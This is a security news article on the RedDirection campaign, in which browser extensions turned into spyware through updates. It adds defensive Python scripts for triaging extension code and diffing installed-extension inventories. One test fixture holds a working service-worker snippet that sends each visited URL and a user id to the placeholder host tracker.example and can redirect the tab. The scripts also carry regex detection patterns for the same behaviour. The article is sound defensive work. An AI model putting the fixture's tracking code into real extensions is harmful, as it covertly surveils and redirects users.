Beware the Hidden Dangers of Browser Extensions
In the era of digital convenience, many users rely on browser extensions to enhance their online experience. These tools streamline tasks, improve productivity, and add functionalities that often come in handy. With over 100,000 installations for seemingly harmless extensions, it’s easy to understand why people trust them without a second thought. However, recent research has unveiled a dark side lurking behind some of these popular tools.
According to an investigation by Koi Security, several well-rated extensions became conduits for malicious surveillance systems. Initially, these extensions provided useful features, such as color picking and video control. Yet, unbeknownst to the users, they transformed over time into spyware that tracked users indiscriminately across the web.
The Extension That Exposed the Threat
The spotlight fell on “Picker Color, Eyedropper – Geco Colorpick,” an extension with over 100,000 users and a plethora of positive reviews. For a long time, it functioned smoothly, allowing users to select colors from their screen without issues. Users had no reason to doubt its legitimacy, and trust was bolstered by a verification seal.
Yet, this reputable tool underwent a sinister change. As revealed by Koi Security researchers, in an unnoticed update, the extension began to monitor web activity, capturing the URLs of visited pages and sending that sensitive information to a remote server. Additionally, it maintained a covert connection to a control infrastructure, effectively turning it from a tool into a surveillance mechanism.
A Broader Network of Deception
The investigation unveiled that “Picker Color” was just the tip of the iceberg. Researchers traced a web of at least 18 different extensions that operated similarly, collectively amassing over 2.3 million installations. These deceptive extensions masqueraded as productivity tools, entertainment aids, and even VPN services designed to unlock popular platforms like TikTok and Discord. Despite their apparent legitimacy, their real goal was both simple and sinister: to spy on users while appearing benign.
What set these extensions apart from conventional malware? They employed a “browser hijacking” technique activated whenever users opened new tabs or navigated between pages. This logic was stealthily embedded within the extension’s background service worker, where it ran without any visible user interface, making it almost impossible for users to detect its malicious behavior.

This mechanism sent the URL of every page the user visited to a remote database alongside a unique identifier assigned to that user. Attackers then had the capability to redirect users to malicious sites or simply log their browsing habits, all occurring silently, without prompting any alerts or visible failures.
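The behaviour described above (a service worker that listens for tab navigation, reads the page URL, ties it to a persistent identifier, sends it off-box and can redirect the tab) leaves recognisable traces in an extension's source. The following static triage script is an added example written for this page; it is not Koi Security's tooling. It takes an unpacked extension as a dictionary of file contents, reads the manifest, and scores the background script against a small set of indicators. The two sample extensions and the `tracker.example` host are constructed fixtures, not real listings.

```python
"""Static triage of an unpacked browser extension for the navigation-tracking
pattern described in the article.  Added example; the indicators are analyst
heuristics, not proof of malice (a legitimate tab manager will trip some)."""
import json
import re

# (indicator name, regex over the background script source)
INDICATORS = [
    ("tab_navigation_listener",
     re.compile(r"chrome\.tabs\.onUpdated\.addListener|chrome\.webNavigation\.on\w+\.addListener")),
    ("tab_url_read", re.compile(r"\b(?:tab|changeInfo|details)\.url\b")),
    ("remote_request", re.compile(r"\bfetch\s*\(|new\s+XMLHttpRequest|navigator\.sendBeacon\s*\(")),
    ("persistent_identifier",
     re.compile(r"crypto\.randomUUID\s*\(|chrome\.storage\.(?:local|sync)\.(?:get|set)")),
    ("tab_redirect", re.compile(r"chrome\.tabs\.update\s*\(")),
]
# Permissions worth surfacing to the analyst regardless of code findings.
NOTABLE_PERMS = ("tabs", "webNavigation", "<all_urls>", "*://*/*")
# The core surveillance pattern: watch navigation, read the URL, send it out.
CORE = {"tab_navigation_listener", "tab_url_read", "remote_request"}


def background_scripts(manifest):
    """Return the list of background script paths (MV3 service worker or MV2 scripts)."""
    bg = manifest.get("background", {})
    if "service_worker" in bg:
        return [bg["service_worker"]]
    return list(bg.get("scripts", []))


def triage(files):
    """files: dict of path -> text for an unpacked extension."""
    manifest = json.loads(files["manifest.json"])
    perms = set(manifest.get("permissions", [])) | set(manifest.get("host_permissions", []))
    code = "\n".join(files.get(path, "") for path in background_scripts(manifest))
    findings = {
        "permissions": [p for p in NOTABLE_PERMS if p in perms],
        "indicators": [name for name, rx in INDICATORS if rx.search(code)],
        "remote_hosts": sorted(set(re.findall(r"https?://([\w.-]+)", code))),
    }
    found = set(findings["indicators"])
    if CORE <= found:
        # Full pattern present; a redirect primitive makes it the hijacking variant.
        findings["risk"] = "high" if "tab_redirect" in found else "medium"
    elif found & CORE:
        findings["risk"] = "low"
    else:
        findings["risk"] = "none"
    return findings


# Constructed fixture: a colour picker that only acts on the active tab on click.
BENIGN = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Picker",
        "permissions": ["activeTab", "scripting"],
        "background": {"service_worker": "sw.js"},
    }),
    "sw.js": """
chrome.action.onClicked.addListener(async (tab) => {
  await chrome.scripting.executeScript({ target: { tabId: tab.id }, files: ["picker.js"] });
});
""",
}

# Constructed fixture reproducing the pattern from the article: every completed
# navigation is reported with a stored per-install id, and the response may
# redirect the tab.  tracker.example is a placeholder host.
SUSPICIOUS = {
    "manifest.json": json.dumps({
        "manifest_version": 3, "name": "Sample Picker Pro",
        "permissions": ["tabs", "storage"], "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "sw.js"},
    }),
    "sw.js": """
const API = "https://tracker.example/collect";
chrome.tabs.onUpdated.addListener(async (tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete") return;
  const { id } = await chrome.storage.local.get("id");
  const r = await fetch(API + "?u=" + id + "&url=" + encodeURIComponent(tab.url));
  const { redirect } = await r.json();
  if (redirect) chrome.tabs.update(tabId, { url: redirect });
});
""",
}

if __name__ == "__main__":
    for label, ext in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, json.dumps(triage(ext), indent=2))
```

The indicators are deliberately coarse: what matters for an analyst is the combination (navigation listener plus URL read plus outbound request), which is why the risk level is computed from the set rather than from any single hit. Minified or obfuscated scripts will defeat the regexes, so a `none` result on a bundle that is unreadable should itself be treated as a finding.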
Time-Bomb of Trust
One particularly alarming aspect of this issue is that these extensions were not malicious from the outset. Many had evolved over time, offering genuine functionality before unleashing their nefarious updates. Researchers posited that this made the campaign especially dangerous: by the time users noticed the changes, they had developed trust in the extensions.
After users had installed these extensions, the malicious code arrived through subsequent updates, a tactic that required no clicks, no social engineering, and no phishing. The browser's automatic update mechanism applied the changes seamlessly, leaving users oblivious to the risk.
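Because the malicious code arrived through a routine version bump rather than a new install, the defensive question is "which extensions changed since I last looked, and did any of them already hold broad access?" The script below is an added example (not Koi Security's or any vendor's tool) that diffs two inventory snapshots of installed extensions. The snapshot format is an assumption: a list of records with `id`, `name`, `version`, `permissions` and `host_permissions`, which an administrator could fill from the browser's extension management page or from endpoint management exports. All extension ids and records below are constructed sample data.

```python
"""Diff two snapshots of installed extensions and flag updates worth a second look.
Added example; the snapshot schema is an assumption and all records are constructed."""

# Permissions that let an extension observe or alter navigation across sites.
SENSITIVE_PERMS = {"tabs", "webNavigation", "webRequest", "cookies", "history"}
# Host patterns that grant access to every site.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}


def version_tuple(v):
    """'1.10.2' -> (1, 10, 2) so that versions compare numerically, not lexically."""
    return tuple(int(p) for p in v.split(".") if p.isdigit())


def has_broad_access(ext):
    return bool(set(ext.get("host_permissions", [])) & BROAD_HOSTS
                or set(ext.get("permissions", [])) & SENSITIVE_PERMS)


def diff_inventory(before, after):
    """Return a list of alert dicts: id, name, kind, severity, detail."""
    old = {e["id"]: e for e in before}
    alerts = []
    for ext in after:
        base = {"id": ext["id"], "name": ext["name"]}
        prev = old.get(ext["id"])
        if prev is None:
            alerts.append({**base, "kind": "new_install", "severity": "info",
                           "detail": ext["version"]})
            continue
        if version_tuple(ext["version"]) <= version_tuple(prev["version"]):
            continue  # no update since the last snapshot
        added_perms = set(ext.get("permissions", [])) - set(prev.get("permissions", []))
        added_hosts = set(ext.get("host_permissions", [])) - set(prev.get("host_permissions", []))
        fired = False
        if added_perms:
            sev = "high" if added_perms & SENSITIVE_PERMS else "low"
            alerts.append({**base, "kind": "permissions_added", "severity": sev,
                           "detail": sorted(added_perms)})
            fired = True
        if added_hosts & BROAD_HOSTS:
            alerts.append({**base, "kind": "broad_host_access", "severity": "high",
                           "detail": sorted(added_hosts & BROAD_HOSTS)})
            fired = True
        elif added_hosts:
            alerts.append({**base, "kind": "host_access_added", "severity": "medium",
                           "detail": sorted(added_hosts)})
            fired = True
        # The article's case: the manifest did not change, only the code did.  An
        # update to something that can already see every page deserves re-triage.
        if not fired and has_broad_access(ext):
            alerts.append({**base, "kind": "updated_with_broad_access", "severity": "medium",
                           "detail": f"{prev['version']} -> {ext['version']}"})
    return alerts


def kinds_for(alerts, ext_id):
    return sorted(a["kind"] for a in alerts if a["id"] == ext_id)


# Constructed snapshots (ids are placeholders, not real store ids).
BEFORE = [
    {"id": "picker-sample-id", "name": "Sample Picker", "version": "1.4.0",
     "permissions": ["tabs", "storage"], "host_permissions": ["<all_urls>"]},
    {"id": "weather-sample-id", "name": "Sample Weather", "version": "2.0.1",
     "permissions": ["geolocation"], "host_permissions": []},
    {"id": "sound-sample-id", "name": "Sample Booster", "version": "3.0",
     "permissions": ["activeTab"], "host_permissions": []},
]
AFTER = [
    {"id": "picker-sample-id", "name": "Sample Picker", "version": "1.5.0",
     "permissions": ["tabs", "storage"], "host_permissions": ["<all_urls>"]},
    {"id": "weather-sample-id", "name": "Sample Weather", "version": "2.0.1",
     "permissions": ["geolocation"], "host_permissions": []},
    {"id": "sound-sample-id", "name": "Sample Booster", "version": "3.1",
     "permissions": ["activeTab", "webNavigation"], "host_permissions": ["<all_urls>"]},
    {"id": "new-sample-id", "name": "Sample Emoji", "version": "0.9",
     "permissions": [], "host_permissions": []},
]

if __name__ == "__main__":
    for alert in diff_inventory(BEFORE, AFTER):
        print(alert)
```

The `updated_with_broad_access` alert is the one that matters for a campaign like this: an extension that already held `tabs` and `<all_urls>` can add tracking code in a version bump without requesting anything new, so a permission diff alone sees nothing. Treat that alert as a trigger to pull the new package and re-run static triage on its service worker.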
The Overlooked Safeguards
Even more concerning, several of these malicious extensions had been verified or promoted within the Chrome and Edge stores, misleading countless users. Their popularity further masked their malicious intent as they garnered reviews and loyal user bases.
Here are some of the extensions identified in the RedDirection campaign by Koi Security:
- PICKER COLOR, EYEDROPPER – GECO COLORPICK
- Emoji Keyboard Online – Copy & Paste Your Emoji
- Free Weather Forecast
- Weather
- Speed Controller Video – Video Manager
- UNLOCK Discord – VPN Proxy to Unblock Discord Anywhere
- UNBLOCK TIKTOK – Seamless Access With One-Click Proxy
- Unlock YouTube VPN
- Dark Theme – Dark Reader for Chrome
- Volume Max – Ultimate Sound Booster
- Volume Booster – Increase Your Sound
- Web Sound Equalizer
- Flash Player – Games Emulator
- Header Value
- Unlock Tiktok
- Volume Booster
- Web Sound Equalizer
- Flash Player
The implications of this report remain staggering. Some extensions have been removed from Chrome and Edge stores, yet others are still readily available for download. Although both Google and Microsoft have been alerted by the Koi Security team, comprehensive measures have yet to be taken against the complete set of questionable extensions.
In the rapidly evolving landscape of online safety, users must exercise caution. While browser extensions can significantly enrich the online experience, they can also pose hidden threats. Awareness and vigilance are essential in ensuring a safer browsing environment.
